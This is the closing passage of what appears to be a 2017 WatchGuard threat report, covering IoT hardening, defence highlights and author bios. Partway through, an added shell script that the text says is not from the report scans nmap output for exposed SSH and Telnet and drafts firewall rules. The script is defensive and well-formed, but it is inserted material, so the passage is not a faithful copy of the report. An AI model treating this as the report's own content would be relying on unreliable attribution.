If consumers are unaware of the account, it’s essentially a backdoor. Before purchasing an IoT device, research
the manufacturer’s history in securing their products. Avoid vendors that are known to include hard-coded
backdoor accounts in their IoT devices.
3. Change default passwords
IoT manufacturers often hardcode weak or non-existent passwords to make their products easier to use (at the
risk of security). When first setting up a new IoT device, your first task should be setting new, difficult-to-guess
passwords wherever possible.
Conclusion & Defense Highlights
One lesson you learn if you follow any trend over time is things change.
Sometimes they change at a glacial pace, so slowly that you may not notice the
alterations. Other times they change overnight, so quickly that you can’t get your
bearings straight. This constant change applies directly to the threat and security
landscape as well.
This quarter, we saw some of the same malware and
network attacks retain their place on our top threat
lists. However, we also saw new threats and exploits
replace the old ones. For instance, macro malware
– a top threat from Q4 2016 – dropped off our list,
becoming less relevant in Q1. Meanwhile, we saw
three times as much Linux malware as we did before,
suggesting attackers have increased their efforts to
target IoT.
When change happens unexpectedly, it feels scary,
and can cause unforeseen surprises that hurt when
they hit you unprepared. However, change doesn’t
have to be scary. In fact, when you vigilantly monitor
change, you can adapt and prepare for it, protecting
yourself from unanticipated consequences.
That’s the whole point of this quarterly security
report – to prepare you for change in the threat
landscape. By staying current with the latest threat
trends, you can adapt your technical and social security strategies to defend against
evolving threats.
Throughout this report, we shared detailed defense
lessons for the individual trends we identified. We’ll
end with a few final high-level defense strategies
every organization should consider.
Defense Highlights
Basic security policies still block many threats
Security experts often spend much of their time talking about the most sophisticated
threats. We get excited about new zero day exploits, the latest kernel rootkits, and other
never-before-seen attacks and evasion techniques. From a security expert’s perspec-
tive, it makes sense to focus on the more interesting, advanced threats, which will surely
become more common in the future. However, our data shows that the top threats
aren’t always new or sophisticated. In fact, most of the popular network attacks we saw
this quarter exploited old vulnerabilities that were patched long ago. Many of the top
malware samples we identified were well-known examples, which attackers have used
for years. Even the vulnerabilities we found in IoT devices were very standard weakness-
es that have simple solutions. The point is, you can prevent a significant slice of these
threats just by following some basic security practices. Patch your software often. Avoid
opening unsolicited files, or clicking unexpected links. Firewall your IoT devices. These
simple practices still do help.
Basic firewalls are incomplete without other security layers
Firewalls remain a critical part of our security infrastructure. You must limit the network
services you expose to the Internet (as proven with unsecure IoT devices). However, a
firewall alone is not enough. Today, most attacks don’t target exposed services directly,
but rather target your users instead. Even with a firewall, almost all organizations open
holes allowing their users to reach the web, get email, or transfer files (among other
things). To protect against today’s client-side attacks, you must also implement a suite
of security services, such as intrusion prevention, anti-malware, IP and URL filtering,
and more to monitor the services you allow through your firewall for malicious activity.
If you don’t yet have a layered security strategy, consider a unified threat management
platform that combines basic firewalling with many other layers of protection.
Segment and harden your IoT devices
In the current state of the industry, IoT devices can’t yet be trusted. While there are
certainly exceptions, our research, as well as other industry research, suggests the vast
majority of IoT devices have major security weaknesses, and can pose a threat to the
rest of your network. You might presume criminals don’t care about your webcams,
refrigerators, or DVRs, but attackers know they can use these local devices to reach
more important computers in your network. Since manufacturers are shipping these
devices with vulnerabilities, it’s up to you to secure them. First, firewall IoT devices from
the Internet and only expose necessary services. In fact, we recommend you segment
them on your internal network, too. That way if someone hijacks your IoT device, they
don’t immediately gain access to everything else. Finally, remember to change default
passwords, disable unnecessary services, and patch these products as often as possible.
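The advice in this highlight, and in the first IoT defense learning earlier (port scan the device for open CLI access, then firewall Telnet and SSH from the Internet and from other internal segments), combine into one check. It is given here as an added example in POSIX shell, not a WatchGuard tool and not code from the report. It reads nmap grepable output (the -oG format), flags every host with TCP 22 or 23 open, and drafts iptables FORWARD rules for a gateway sitting between segments that allow those ports only from an assumed management subnet and drop them from everywhere else, including other internal networks. The three host lines are constructed sample output (real -oG output separates its fields with tabs, which the parser tolerates), the 10.0.99.0/24 management subnet is an assumption, and the rules are printed for review rather than applied.

```shell
#!/bin/sh
# Added example: find IoT devices that expose a CLI and draft firewall rules
# for them. Not a WatchGuard tool; the scan output below is constructed.

# Constructed sample of `nmap -p 22,23,80,443,554,9100 -oG - 192.168.1.0/24`
# (three hosts; nmap writes tabs between fields, spaces are used here).
SAMPLE_SCAN='Host: 192.168.1.20 (camera.lan) Ports: 80/open/tcp//http///, 23/open/tcp//telnet///, 554/open/tcp//rtsp/// Ignored State: closed (3)
Host: 192.168.1.21 (printer.lan) Ports: 22/closed/tcp//ssh///, 9100/open/tcp//jetdirect/// Ignored State: closed (4)
Host: 192.168.1.22 (thermostat.lan) Ports: 22/open/tcp//ssh///, 443/open/tcp//https/// Ignored State: closed (4)'

# Assumed management subnet: the only source allowed to reach IoT CLIs.
MGMT_NET=10.0.99.0/24

# Read grepable nmap output on stdin; print "ip port" for each host with
# Telnet (23) or SSH (22) open. The match requires a space before the port
# number and the literal "/open/tcp/" after it, so a closed port or a
# different number such as 2222 is not mistaken for an exposed CLI.
flag_exposed_cli() {
    while IFS= read -r line; do
        case $line in "Host: "*) ;; *) continue ;; esac
        ip=${line#Host: }
        ip=${ip%% *}
        for port in 22 23; do
            case $line in
                *" $port/open/tcp/"*) printf '%s %s\n' "$ip" "$port" ;;
            esac
        done
    done
}

# Turn "ip port" lines (stdin) into iptables FORWARD rules: accept from the
# management subnet, drop everything else. The rules are printed, not
# applied; review them, then run them on the gateway between segments.
iot_cli_rules() {
    while read -r ip port; do
        [ -n "$ip" ] || continue
        printf 'iptables -A FORWARD -s %s -d %s -p tcp --dport %s -j ACCEPT\n' "$MGMT_NET" "$ip" "$port"
        printf 'iptables -A FORWARD -d %s -p tcp --dport %s -j DROP\n' "$ip" "$port"
    done
}

# Number of exposed CLI services in the sample scan.
count_exposed() {
    printf '%s\n' "$SAMPLE_SCAN" | flag_exposed_cli | wc -l | tr -d ' '
}

echo '# exposed CLI services (ip port):'
printf '%s\n' "$SAMPLE_SCAN" | flag_exposed_cli
echo '# draft rules:'
printf '%s\n' "$SAMPLE_SCAN" | flag_exposed_cli | iot_cli_rules
```

Against a live network, replace SAMPLE_SCAN with the output of nmap -oG on the IoT segment; the ACCEPT-before-DROP ordering matters because iptables evaluates rules in sequence, and the DROP rule carries no source, which is what blocks pivoting from other internal networks rather than just from the Internet.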
Invest in advanced malware prevention
We said it last quarter, and it remains true this quarter; if you don’t have an advanced
malware protection solution, you will eventually get infected. While many of the threats
we see are well known, it’s clear attackers regularly repackage their old malware to
evade pattern-based detection. This quarter we learned that 38% – over one third – of
the malware we detected got past legacy signature-based AV solutions. The industry
has long understood the weakness in reactive, pattern-based AV, but this problem has
reached a critical mass. More and more victims are getting infected with threats like
ransomware despite having basic protection. To catch today’s more evasive malware,
you need solutions that use more proactive detection techniques, such as behavioral
analysis, or machine learning and big data analytics. We recommend you invest in an
advanced malware solution. If you’re a WatchGuard customer, our APT Blocker and
Threat Detection and Response offerings provide this service.
Summary
If you made it this far, thank you for reading our report to the end. We hope you found the trends and analysis
enlightening, and use these learnings to protect your networks and organizations. Feel free to share any
feedback you have about the report with [email protected], and join us next quarter.
About WatchGuard Threat Lab
WatchGuard’s Threat Lab (previously the LiveSecurity Threat Team) is a group of dedicated threat researchers
committed to discovering and studying the latest malware and Internet attacks. The Threat Lab team analyzes
data from WatchGuard’s Firebox Feed, internal and partner threat intelligence, and a research honeynet, to
provide insightful analysis about the top threats on the Internet. Their smart, practical security advice will
enable you to better protect your organization in the ever-changing threat landscape.
About WatchGuard Technologies
WatchGuard® Technologies, Inc. is a global leader in network security, providing best-in-class Unified Threat
Management, Next Generation Firewall, secure Wi-Fi, and network intelligence products and services to more
than 80,000 customers worldwide. The company’s mission is to make enterprise-grade security accessible
to companies of all types and sizes through simplicity, making WatchGuard an ideal solution for distributed
enterprises and SMBs. WatchGuard is headquartered in Seattle, Washington, with offices throughout North
America, Europe, Asia Pacific, and Latin America. To learn more, visit WatchGuard.com.
For additional information, promotions and updates, follow WatchGuard on Twitter @WatchGuard, on
Facebook, and on the LinkedIn Company page. Also, visit our InfoSec blog, Secplicity, for real-time information
about the latest threats and how to cope with them at www.secplicity.org.
Corey Nachreiner
Chief Technology Officer
Recognized as a thought leader in IT security, Nachreiner spearheads WatchGuard’s
technology vision and direction. Previously, he was the director of strategy and
research at WatchGuard. Nachreiner has operated at the frontline of cyber security
for 16 years, and for nearly a decade has been evaluating and making accurate
predictions about information security trends. As an authority on network security
and internationally quoted commentator, Nachreiner’s expertise and ability to dissect
complex security topics make him a sought-after speaker at forums such as Gartner,
Infosec and RSA. He is also a regular contributor to leading publications including
CNET, Dark Reading, eWeek, Help Net Security, Information Week and Infosecurity,
and delivers WatchGuard’s “Daily Security Byte” video on Facebook.
Marc Laliberte
Security Threat Analyst
Specializing in network security technologies, Marc’s industry experience allows him
to conduct meaningful information security research and educate audiences on the
latest cyber security trends and best practices. With speaking appearances at IT
conferences and regular contributions to online IT and security publications, Marc is
a security expert who enjoys providing unique insights and guidance to all levels of
IT personnel.
© 2017 WatchGuard Technologies, Inc. All rights reserved. WatchGuard, the WatchGuard logo, LiveSecurity, and Firebox are registered trademarks of WatchGuard Technologies, Inc. in the United States and/or other countries. All other tradenames are the property of their respective owners. Part No. WGCE67003_062017